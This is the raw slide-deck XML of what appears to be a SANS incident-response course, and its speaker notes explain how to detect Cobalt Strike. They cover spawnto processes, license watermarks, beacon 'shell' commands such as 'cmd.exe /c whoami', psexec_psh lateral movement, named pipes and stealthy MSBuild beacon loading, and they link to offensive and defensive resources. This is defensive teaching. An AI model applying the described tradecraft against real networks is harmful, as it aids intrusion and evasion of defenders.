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407" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="404" r:id="rId4"/>
    <p:sldId id="405" r:id="rId5"/>
    <p:sldId id="391" r:id="rId6"/>
    <p:sldId id="3378" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="350" r:id="rId9"/>
    <p:sldId id="355" r:id="rId10"/>
    <p:sldId id="3367" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="3379" r:id="rId14"/>
    <p:sldId id="3380" r:id="rId15"/>
    <p:sldId id="3338" r:id="rId16"/>
    <p:sldId id="357" r:id="rId17"/>
    <p:sldId id="263" r:id="rId18"/>
    <p:sldId id="3376" r:id="rId19"/>
    <p:sldId id="3334" r:id="rId20"/>
    <p:sldId id="3383" r:id="rId21"/>
    <p:sldId id="3381" r:id="rId22"/>
    <p:sldId id="3382" r:id="rId23"/>
    <p:sldId id="33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F246386-0B80-AC47-ABDE-7FE7D262C60D}">
          <p14:sldIdLst>
            <p14:sldId id="407"/>
            <p14:sldId id="259"/>
            <p14:sldId id="404"/>
            <p14:sldId id="405"/>
            <p14:sldId id="391"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Ryan" id="{EFE8AA9C-9257-8846-8550-A71A450EFBE6}">
          <p14:sldIdLst>
            <p14:sldId id="3378"/>
            <p14:sldId id="262"/>
            <p14:sldId id="350"/>
            <p14:sldId id="355"/>
            <p14:sldId id="3367"/>
            <p14:sldId id="283"/>
            <p14:sldId id="265"/>
            <p14:sldId id="3379"/>
            <p14:sldId id="3380"/>
            <p14:sldId id="3338"/>
            <p14:sldId id="357"/>
            <p14:sldId id="263"/>
            <p14:sldId id="3376"/>
            <p14:sldId id="3334"/>
            <p14:sldId id="3383"/>
            <p14:sldId id="3381"/>
            <p14:sldId id="3382"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Q&amp;A" id="{11FBD562-8471-5E42-AFD3-937174D2E892}">
          <p14:sldIdLst>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83"/>
    <p:restoredTop sz="95503" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="4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BD405-8247-414B-96C0-FF0C83A3A5A8}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>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657827-D709-0D4E-B2F5-DCBCE902FDAD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46114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657827-D709-0D4E-B2F5-DCBCE902FDAD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3372458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charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>One of the items within the malleable profile is a section labeled on to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> values. The default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> value is rundll32.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Often when you find cobalt strike in your environment, it will look like it is rundll32.exe. Some of the most common include: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>gpupdate.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>mstsc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>dllhost,exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> and then as far as the others, it really changes every month.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>There is an (anonymous) Twitter bot (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Cobaltstrikebot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>) that does a bunch of auto analysis and scanning of looking for Team Server environments and usually uses SSL certificate identification to identify a lot of these Cobalt Strike Team Servers. Beacons are created with a watermark, which contains information about the software license used to generate them, so seeing 1234567890 or 0 would be a great indicator of a cracked version of CS.</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This slide shows former BlackBerry Threat Intelligence analyst Tom Bonner’s research indicating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SpawnTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> processes that his team identified during Q3-Q4 of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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>You can review Tom’s original Twitter post including this graphic here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://for528.com/cs-spawnto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481604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dirty="0"/>
              <a:t>There are a number of TAs who keep creating undetectable loaders.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They do this by creating a C Code payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A massive feature of CS is called arsenal. It provides a bunch of additional features to use within CS. It as aggressor scripts which can be used within the beacon. This allows your beacon to run custom commands.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243701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dirty="0"/>
              <a:t>The most common thing executed via a beacon connection is the command, “shell”. When a CS actor types in ”shell” and anything after it, it opens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the target machine, provides /c and whatever command came after shell. And the parent process would be whatever the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was set to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, if the TA typed in with a rundll32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spawnto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parent process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rundll32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You would see this running on the target machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> /c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This article breaks down some of these commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>hausec.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/2021/07/26/cobalt-strike-and-tradecraft/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Psexec_psh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> is a PowerShell implementation of the method which allows you to move and copy things to another device using the same methods that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>PSexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> does, by creating pipes etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Want to learn more about how TAs use CS, including the commands they often run?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If so, simply review S1ckB0y1337’s “Cobalt Strike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CheatSheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” on GitHub: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/cheatsheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3018749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dirty="0"/>
              <a:t>The BEST resources available are both from The DFIR Report crew. KUDOS (as usual) to the amazing DFIR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Reprot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> crew for their amazing work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Cobalt Strike, a Defender’s Guide Part 1”: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/dfirreport-cs1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Cobalt Strike, a Defender’s Guide Part 2”: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/dfirreport-cs2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SANS author &amp; instructor Chad Tilbury’s SANS DFIR Summit 2021 presentation is also an amazing resource: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/cs-tilbury</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Some important items for you to review in his talk:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WmiPrvSE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> spawning PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> spawning PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; Multiple rundll32.exe processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rundll32 with no command line options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relevance of SysWow64 use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common named pipes @ 24:44 (including "set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pipename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" @ 26:00)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Named pipe naming schemes @ 27:00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cracked, older versions of CS @ 31:40</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat actors who want to be more stealth use Microsoft’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSBuild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to build Beacons in memory (hint hint!). You can learn more about this process via the following articles: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Anomali’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> “Threat Actors Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSBuild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to Deliver RATs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Filelessly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” article: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/msbuild-chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red Teaming Experiments’ “Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSBuild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to Execute Shellcode in C#” article: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>https://for528.com/msbuild-chain2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>If you want to learn even more about Cobalt Strike, Google these resources:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full-Spectrum Cobalt Strike Detection (Recorded Future)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detecting Cobalt Strike with Memory Signatures (Elastic)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open-source Cobalt Strike Parser (Sentinel One)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strike Back at Retired Cobalt Strike (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NCCGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understanding Cobalt Strike Profiles (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZeroSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deep Dive into Malleable C2 (Specter Ops)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="516331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000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>There are many parsers for examining and parsing CS beacons. Many of them will be simply named, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>beacon.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>beacon.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> as it’s the default name. The beacon files will include the configuration. Some of the tools listed below will pull that configuration out. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
